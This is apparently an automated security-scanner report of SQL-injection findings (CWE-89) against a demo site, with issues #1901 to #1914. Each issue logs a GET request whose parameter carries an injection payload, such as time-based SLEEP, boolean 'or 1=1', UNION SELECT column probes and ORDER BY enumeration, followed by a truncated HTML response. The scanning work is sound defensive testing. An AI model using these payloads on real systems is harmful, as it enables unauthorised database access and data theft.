href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1901\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1902\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1903\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1904\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1905Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1906\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1907\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1908\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1909\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1910\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1911\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1912\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7506=9091 AND (5913=\n5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1913Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1914\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 